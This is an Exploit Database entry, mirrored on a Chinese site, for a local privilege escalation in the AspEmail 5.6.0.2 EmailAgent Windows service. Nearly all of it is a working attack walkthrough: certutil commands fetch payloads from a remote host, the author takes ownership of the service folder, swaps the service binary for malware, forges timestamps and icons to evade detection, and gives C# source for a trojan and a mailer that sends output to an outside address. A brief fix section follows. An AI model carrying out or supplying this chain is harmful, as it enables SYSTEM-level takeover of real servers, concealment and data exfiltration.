AspEmail v5.6.0.2 – Local Privilege Escalation

• Exploit Database
• 42 阅读

• 作者： Zer0FauLT
  日期： 2023-04-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51380/

• ####################################################################################################################
  # Exploit Title:AspEmail 5.6.0.2 - Local Privilege Escalation#
  # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
  # Date: 13/04/2023 #
  # Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
  # Vendor Homepage: https://www.aspemail.com#
  # Software Link: https://www.aspemail.com/download.html#
  # Product: AspEmail#
  # Version: AspEmail 5.6.0.2 and all#
  # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU#
  # Tested on: Windows Server 2016 and Windows Server 2019 #
  # CVE : 0DAY #
  ####################################################################################################################
  
  # ==================================================================================================================
  
  [+] C:\PenTest>whoami /priv
  
   PRIVILEGES INFORMATION
   ----------------------
  
   Privilege NameDescription State 
   ============================= ========================================= ========
   SeIncreaseQuotaPrivilegeAdjust memory quotas for a processDisabled
   SeChangeNotifyPrivilege Bypass traverse checkingEnabled 
   SeImpersonatePrivilegeImpersonate a client after authentication Enabled 
   SeIncreaseWorkingSetPrivilege Increase a process working setDisabled
   
  # ==================================================================================================================
  
  * First, we will test whether the AspEmail service is active.
  * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
  
  [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
   EmailAgent.exe4400 Persits Software EmailAgent
  
   or 
  
  [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
   EmailAgent64.exe4400 Persits Software EmailAgent
   
  * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". 
  * Now we know that AspEmail service is active.
  
  # ==================================================================================================================
  
  * We will need these:
  
  [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
  [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
  [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
  [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
  [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
  
  # ==================================================================================================================
  
  [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
  
   Name: Persits Software EmailAgent
   ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
   Agent.exe" /run
   User: LocalSystem
   ModifiablePath: C:\Program Files (x86)\Persits Software\AspEmail\BIN
   IdentityReference : Everyone
   Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, 
   AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, 
   ReadExtendedAttributes, DeleteChild, Execute/Traverse
   Status: Unknown
   UserCanStart: False
   UserCanStop : False
   
  [+] C:\PenTest>del PrivescCheck.ps1
  
  * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
  
  # ================================================================================================================== #
  
  [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
  
  Successfully processed 0 files; Failed processing 1 files
  C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
  
  * We do not have permission to access subdirectories.
  
  # ==================================================================================================================
  
  [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  
   C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
  DeepSecLab\psacln:(I)(OI)(CI)(N)
  DeepSecLab\psaadm:(I)(OI)(CI)(N)
  DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
  BUILTIN\Administrators:(I)(F)
  CREATOR OWNER:(I)(OI)(CI)(IO)(F)
  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
  NT SERVICE\TrustedInstaller:(I)(CI)(F)
  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
  BUILTIN\Users:(I)(OI)(CI)(RX)
  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
  							
  * Unlike other directories, we have full privileges in the "BIN" directory of the service. 
  * This is chmod 0777 - rwxrwxrwx in linux language.
  							
  # ==================================================================================================================
  													 
  [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
  
   __PATH 
  
   \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" 
  
   \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
  root\cimv2DeepSecLab{}5Win32_SID.SID="S-1-5-32-544"Win32_SIDWin32_SID2Administrators{1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}BUILTINS-1-5-32-54416
   [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
  
  * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
  
  # ==================================================================================================================
  
  * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
  
  [+] C:\PenTest>whoami
  DeepSecLab\Hacker
  
  [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
  
  [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
  
  processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
  Successfully processed 1 files; Failed processing 0 files
  
  * Ok. All commands resulted successfully. We now have full privileges for this directory.
  
  # ==================================================================================================================
  
  * Now we will modify the EmailAgent file and inject a self-written malware. 
  * We will be careful not to damage any files while doing this so that all transactions can be easily undone.
  
  [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
  [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
  
  # ==================================================================================================================
  
  [+]C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291
  
   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
  
  14.04.202316:47<DIR>.
  14.04.202316:47<DIR>..
  01.03.200415:55 143.360 AspEmail.dll
  25.02.200416:23 188.416 AspUpload.dll
  13.04.202322:0012.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
  24.09.200309:22 139.264 EmailAgentCfg.cpl
  24.09.200309:2594.208 EmailLogger.dll
  24.09.200309:21 167.936 Null.EmailAgent.exe
   6 File(s)745.472 bytes
   2 Dir(s)165.936.717.824 bytes free
  			 
  # ==================================================================================================================
  
  * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
  
  [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
  [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
  
  * And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
  * I used the Resource Tuner Console tool. 
  >>> http://www.restuner.com/tour-resource-tuner-console.htm
  * This can be done easily with the Resource Tuner tool.
  >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
  >>> http://www.restuner.com/download.htm
  
  # ==================================================================================================================
  
  [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291
  
   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
  
  14.04.202316:47<DIR>.
  14.04.202316:47<DIR>..
  01.03.200415:55 143.360 AspEmail.dll
  25.02.200416:23 188.416 AspUpload.dll
  24.09.200309:2112.288 EmailAgent.exe
  24.09.200309:22 139.264 EmailAgentCfg.cpl
  24.09.200309:2594.208 EmailLogger.dll
  24.09.200309:21 167.936 Null.EmailAgent.exe
   6 File(s)745.472 bytes
   2 Dir(s)165.936.717.824 bytes free
  			 
  [24.09.200309:21]12.288 EmailAgent.exe
  [24.09.200309:21] 167.936 Null.EmailAgent.exe
  
  * And time manipulation is over. They look like they were uploaded at the same time long ago.
  
  # ==================================================================================================================
  
  * Now we check for my malware ownership.
  
  [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
  
  __PATH
  
  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
  
  \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2DeepSecLab{}5Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"Win32_SIDWin32_SID2Hacker{1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}DeepSecLabS-1-5-21-3674093405-176013069-2091862131-151128
  
  [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
  
  Name
  
  DeepSecLab\Hacker
  
   EmailAgent.exe Owner: DeepSecLab\Hacker
  
  # =================================================================================================================#
  ##
  ####################################################################################################################
  # #[EmailAgent.cs]##
  ####################################################################################################################
  ## 
   #
  * We program this malware in such a way that when the server is reboot(when the services are restarted), #
  * It will be triggered and execute the codes we want,#
  * And then send a printout of all this to the email address we specified.#
   #
   using System; #
   using System.Linq;#
   using System.Text;#
   using System.Diagnostics; #
   using System.IO;#
   using System.Collections; #
   #
   Namespace CliToolSpace#
   { #
   class _Main #
   { #
   static void Main(string[] args) #
   { #
   Cli commandLine = new Cli();#
   commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
   commandLine.Execute();#
   commandLine.ToFile(@"C:\Windows\Temp\");#
   } #
   } #
   } #
   #
  ##
  ####################################################################################################################
  # #[Mail.cs]##
  ####################################################################################################################
  ##
   #
   using System; #
   using System.Net.Mail;#
   using System.Net; #
   SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");#
   var mail = new MailMessage(); #
   mail.From = new MailAddress("mail@deepseclab.com"); #
   mail.To.Add("mail@hacker.com"); #
   mail.Subject = "Trigger Successful!"; #
   mail.IsBodyHtml = true; #
   string htmlBody;#
   htmlBody = "<strong>This server has been rebooted.</strong>"; #
   mail.Body = htmlBody; #
   Attachment attachment;#
   attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
   mail.Attachments.Add(attachment); #
   SmtpServer.Port = 587;#
   SmtpServer.UseDefaultCredentials = false; #
   SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
   SmtpServer.EnableSsl = true;#
   SmtpServer.Timeout = int.MaxValue;#
   SmtpServer.Send(mail);#
   #
  ##
  ####################################################################################################################
  # #[Run.bat]##
  ####################################################################################################################
  ##
   #
  whoami > C:\Windows\Temp\Export.txt#
  cd C:\Program Files (x86)\Persits Software\AspEmail\Bin#
  del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe#
  cd c:\Windows\Tasks#
  del Run.bat & del Mail.exe #
   #
  ##
  ####################################################################################################################
  ##
   [+]Trigger Successful![+] #
  												 #
  [+] C:\PenTest>systeminfo | findstr "Boot Time"#
  System Boot Time:13.04.2022, 07:46:06#
   #
  ##
  ####################################################################################################################
  #[Export.txt]# #
  ####################################################################################################################
  ##
   #
  NT AUTHORITY\SYSTEM				 #
   #
  ##
  ####################################################################################################################
  #													 #									 
  # ==================================================================================================================
  # ...|||[FIX]|||...#
  # ==================================================================================================================
  #[+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
  # =================================================================================================================#
  
  [+] C:\Administrator>sc qc "Persits Software EmailAgent"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_Name: Persits Software EmailAgent
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_Name : Persits Software EmailAgent
  DEPENDENCIES : rpcss
  SERVICE_START_Name : LocalSystem
  
  # ==================================================================================================================
  
  [+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
  
  D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
  
  # ==================================================================================================================
  
  [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
  
  Accesschk v6.15 - Reports effective permissions for securable objects
  Copyright (C) 2006-2022 Mark Russinovich
  Sysinternals - www.sysinternals.com
  
  Persits Software EmailAgent
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
  SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
  SERVICE_ALL_ACCESS
  		
  # ==================================================================================================================
  
  [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
  
  [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  
  Successfully processed 0 files; Failed processing 1 files
  C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
  
  DONE!
  
  # ==================================================================================================================
  
  [+] C:\Administrator>sc stop "Persits Software EmailAgent"
  
  [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
  
  * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
  
  # ==================================================================================================================